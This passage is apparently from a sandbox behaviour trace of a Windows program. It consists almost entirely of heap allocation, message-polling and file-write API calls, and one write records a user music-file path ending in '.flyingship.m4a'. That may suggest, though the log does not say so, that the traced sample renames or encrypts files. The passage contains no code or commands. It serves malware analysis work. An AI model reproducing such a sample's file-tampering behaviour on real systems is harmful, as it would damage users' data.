hFile=0x138, liDistanceToMove=0x20f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.402] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0184.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.flyingship.m4a\r\n", cchWideChar=108, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 108 [0184.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6c) returned 0x906f38 [0184.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.flyingship.m4a\r\n", cchWideChar=108, lpMultiByteStr=0x906f38, cbMultiByte=108, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.flyingship.m4a\r\n", lpUsedDefaultChar=0x0) returned 108 [0184.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0184.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0184.402] WriteFile (in: hFile=0x138, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x6b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x6b, lpOverlapped=0x0) returned 1 [0184.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0184.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.403] CloseHandle (hObject=0x138) returned 1 [0184.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900098 | out: hHeap=0x8a0000) returned 1 [0184.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0184.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0184.409] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0184.410] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0184.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0184.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0184.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0184.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0184.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0184.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0184.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0184.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0184.412] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0184.412] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.412] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0184.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0184.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0184.412] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0184.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0184.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0184.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0184.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0184.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0184.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0184.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0184.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0184.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0184.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0184.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0184.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0184.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0184.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0184.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0184.414] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0184.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0184.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0184.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0184.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0184.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0184.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0184.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0184.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0184.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0184.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0184.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0184.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0184.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0184.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0184.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0184.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0184.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0184.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0184.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.418] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0184.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0184.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0184.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0184.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 